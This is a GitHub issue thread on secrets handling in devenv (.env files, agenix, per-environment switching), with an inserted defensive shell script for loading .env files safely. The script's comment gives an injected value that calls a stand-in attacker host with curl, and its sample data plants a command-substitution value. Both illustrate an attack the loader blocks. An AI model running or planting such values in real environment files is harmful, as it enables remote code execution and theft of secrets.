cachix / devenv

Fast, Declarative, Reproducible, and Composable Developer Environments
https://devenv.sh
Apache License 2.0
3.56k stars 259 forks

Secrets #736

Open happysalada opened 10 months ago

happysalada commented 10 months ago

Is there an integration with something like agenix for secrets handling inside the repo? For deployments and/or database connections, for example.

domenkozar commented 10 months ago

We do have .env support and for basic use cases https://www.dotenv.org/ works really well.

It would be great to have also agenix and sops support!

happysalada commented 10 months ago

When you say .env support, you mean adding an env var just like in a nix derivation, not an actual .env, right?

I was looking for the environment variable section in the documentation and couldn't find it.

Also, the ability to switch between .env files would be amazing. So you could connect to the staging db then connect to your local db with just a switch of environment.

domenkozar commented 10 months ago

https://devenv.sh/integrations/dotenv/

happysalada commented 9 months ago

This is quite nice, but I'm trying to reconcile this with the fact that envs are dynamic. I would think most production setups include at least 2 environments (dev and staging), and small companies most likely have production as well.

Having it hardcoded in the devenv file feels wrong. Should there be some shell helpers to set the environment based on some predefined files?

I'm thinking out loud here of course and not sure of what the best solution would be.

Maybe actually the best solution is just to have particular functions preceded by `dotenv --env .env.staging`. So the solution would just be to have different shell functions for different purposes.

domenkozar commented 9 months ago

Currently you can do `dotenv.filename = ".env.production";` to tell it to load an env-specific environment.

I'd be curious to hear what kind of workflow you'd expect and we can implement it.

happysalada commented 9 months ago

I have a web app where I want to be able to do `pnpm run dev` to start developing. Obviously this has to include all the dev environment. Then I want to test my workflow with the staging env vars to verify I haven't forgotten a migration or anything. Last is that sometimes I need to apply db changes to production and I need to be able to connect there. So I have tasks that require 3 different environments, with different commands that need to be run.

The way to currently approach the problem is to use `dotenv-cli -e .env.common.dev -e .env.my_app.dev pnpm run dev`. That will run my development environment. I need to switch the env and the command for other tasks, but it works.

What I would imagine would be amazing would be a shell command that gives me the dev env vars loaded directly. Then I can just `pnpm run dev` and be good to go. I shouldn't have to make custom commands for each environment, I think.

The worst with this approach is that i have to go through an external service to not commit my secrets to the repo. Having them encrypted right there and then would be amazing.

Let me know if any of that is too vague

eth3lbert commented 9 months ago

I thought you could use scripts to achieve something similar.

happysalada commented 9 months ago

Definitely! That's what I meant by command. It's a bit boilerplate-y, but it works for now. I was trying to think about an ideal outcome.

gallexme commented 9 months ago

@happysalada I edited the agenix home-manager module so it can be used from devenv (even on non-NixOS/HM/nix-darwin machines). Example: https://gist.github.com/gallexme/9ade2bc91df4d4263ee006264e2f3b9d. It's still compatible with agenix and agenix-rekey; it decrypts the secrets in your repo's folder when you enter devenv, so add those folders to .gitignore. Haven't had the time to make it nicer yet.

happysalada commented 9 months ago

@gallexme nice!

I've given some thought to the .env API that I think would make sense. It seems to me it should look like this:

{
  environments = {
    dev = {
      NODE_ENV.value = "development"; # just an example
      OPENAI_API_KEY.file = ".env/OPENAI_API_KEY.age"; # in case there is an integration with agenix
      default = true; # to signify that by default you are on this environment
      ....
    };
    staging = {
      ....
    };
  };
}

with a nice command for switching from one to the other: `switch_env dev` or `switch_env staging`, or something similar. These are just my thoughts.

Additionally the welcome message that is used in https://github.com/numtide/devshell would be amazing. Just to tell you which environments are available and how to switch into them.

Just some thoughts.

Atry commented 1 month ago

> We do have .env support and for basic use cases https://www.dotenv.org/ works really well.
>
> It would be great to have also agenix and sops support!

As mentioned here, loading secrets from .env into nix expressions can lead to publishing your secrets. Shall we instead load the .env in shell startup scripts, instead of in nix expressions?
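The two ideas above, happysalada's `switch_env dev` / `switch_env staging` workflow and Atry's point that secrets should be parsed by the shell rather than by Nix, fit in one small script. The example below is added here and is not devenv's or any commenter's code. It assumes the file layout used earlier in the thread (`.env.common.<env>` plus `.env.<env>`), that `DEVENV_ROOT` is the project-root variable devenv exports inside the shell (pass the directory explicitly if yours differs), and that it is wired in through devenv's `enterShell` option, e.g. `enterShell = ''. ./secrets.sh; switch_env dev'';`. All function names are this example's own. The security-relevant difference from `. .env`: values are taken literally rather than executed, the file is rejected unless it is owner-only, nothing is exported unless the whole file validates, and switching environments first unsets what the previous one exported so a staging credential cannot survive into dev. Because the values only ever exist in the shell, none of them become Nix strings, which is what keeps them out of the world-readable /nix/store and out of any binary cache the project pushes to.

```shell
#!/bin/sh
# Added example, not devenv's own code. Source this from devenv's enterShell
# so secrets are parsed by the shell at entry time and never pass through
# Nix evaluation (a value a Nix expression sees ends up in /nix/store).
# Assumed layout, following the thread: .env.common.<env> and .env.<env>.

: "${DOTENV_LOADED_KEYS:=}"   # space-separated names exported by the last load

# parse_kv LINE: set kv_key/kv_val from a KEY=VALUE line; return 1 if invalid.
# The value is taken literally, so unlike `. .env` a line such as
# TOKEN=$(curl attacker.example) can never execute anything.
parse_kv() {
    kv_line=$1
    kv_line=${kv_line#"${kv_line%%[![:space:]]*}"}           # strip leading blanks
    case $kv_line in export\ *) kv_line=${kv_line#"export "} ;; esac
    case $kv_line in *=*) ;; *) return 1 ;; esac
    kv_key=${kv_line%%=*}
    kv_val=${kv_line#*=}
    case $kv_key in ''|[!A-Za-z_]*|*[!A-Za-z0-9_]*) return 1 ;; esac  # not an identifier
    case $kv_val in                                           # drop matching outer quotes
        \"*\") kv_val=${kv_val#\"}; kv_val=${kv_val%\"} ;;
        \'*\') kv_val=${kv_val#\'}; kv_val=${kv_val%\'} ;;
    esac
    return 0
}

# load_dotenv FILE: export every KEY=VALUE in FILE. The whole file is
# validated before anything is exported, so a malformed line leaves the
# environment untouched. A file readable by group/others is refused:
# secrets belong in 0600 files that are listed in .gitignore.
load_dotenv() {
    ld_file=$1
    [ -f "$ld_file" ] || { echo "load_dotenv: $ld_file: no such file" >&2; return 1; }
    case $(ls -ld "$ld_file" | cut -c5-10) in                  # group/other rwx bits
        *[rwx]*) echo "load_dotenv: $ld_file: readable by others, chmod 600 it" >&2; return 1 ;;
    esac
    set --                                                    # validated pairs go in $@
    ld_n=0
    while IFS= read -r ld_line || [ -n "$ld_line" ]; do
        ld_n=$((ld_n + 1))
        ld_body=${ld_line#"${ld_line%%[![:space:]]*}"}
        case $ld_body in ''|'#'*) continue ;; esac            # blank line or comment
        parse_kv "$ld_line" || { echo "load_dotenv: $ld_file:$ld_n: malformed line" >&2; return 1; }
        set -- "$@" "$kv_key=$kv_val"
    done < "$ld_file"
    for ld_pair; do
        export "$ld_pair"                                     # no re-evaluation of the value
        DOTENV_LOADED_KEYS="$DOTENV_LOADED_KEYS ${ld_pair%%=*}"
    done
}

# switch_env NAME [DIR]: drop whatever the previous environment exported, then
# load DIR/.env.common.NAME (if present) and DIR/.env.NAME. Unsetting first is
# the point: a staging DATABASE_URL must not survive a switch to dev just
# because dev's file happens not to define one.
switch_env() {
    se_name=$1
    se_dir=${2:-${DEVENV_ROOT:-.}}   # DEVENV_ROOT: assumed exported by devenv in the shell
    case $se_name in ''|*[!A-Za-z0-9_-]*) echo "switch_env: bad name '$se_name'" >&2; return 1 ;; esac
    [ -f "$se_dir/.env.$se_name" ] || { echo "switch_env: $se_dir/.env.$se_name not found" >&2; return 1; }
    for se_key in $DOTENV_LOADED_KEYS; do unset -v "$se_key"; done
    DOTENV_LOADED_KEYS=
    if [ -f "$se_dir/.env.common.$se_name" ]; then
        load_dotenv "$se_dir/.env.common.$se_name" || return 1
    fi
    load_dotenv "$se_dir/.env.$se_name" || return 1
    export DOTENV_ACTIVE_ENV="$se_name"
    echo "environment '$se_name' active:$DOTENV_LOADED_KEYS"
}

# write_sample_envs DIR: constructed sample files (no real credentials) so the
# example runs offline; .env.broken and .env.world exist to exercise the checks.
write_sample_envs() {
    ws_dir=$1
    mkdir -p "$ws_dir"
    printf '%s\n' '# shared by dev-like environments' 'APP_NAME=myapp' > "$ws_dir/.env.common.dev"
    printf '%s\n' 'NODE_ENV=development' 'DATABASE_URL="postgres://localhost/dev"' > "$ws_dir/.env.dev"
    printf '%s\n' 'NODE_ENV=production' 'export DATABASE_URL=postgres://db.staging.internal/app' \
        "OPENAI_API_KEY='sk-constructed-example'" 'FEATURE_FLAG=$(echo injected)' > "$ws_dir/.env.staging"
    printf '%s\n' 'NODE_ENV=broken' '1BAD=identifier' > "$ws_dir/.env.broken"
    printf '%s\n' 'LEAKED=yes' > "$ws_dir/.env.world"
    chmod 600 "$ws_dir"/.env.*
    chmod 644 "$ws_dir/.env.world"                            # deliberately too open
}
```

Usage inside the devenv shell is `switch_env staging` followed by `pnpm run dev`, then `switch_env dev` to go back; the `FEATURE_FLAG=$(echo injected)` line in the constructed staging file ends up as the literal string `$(echo injected)`, which is the behaviour a plain `source .env` would not give you.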

MrFoxPro commented 2 weeks ago

This can help https://github.com/aciceri/agenix-shell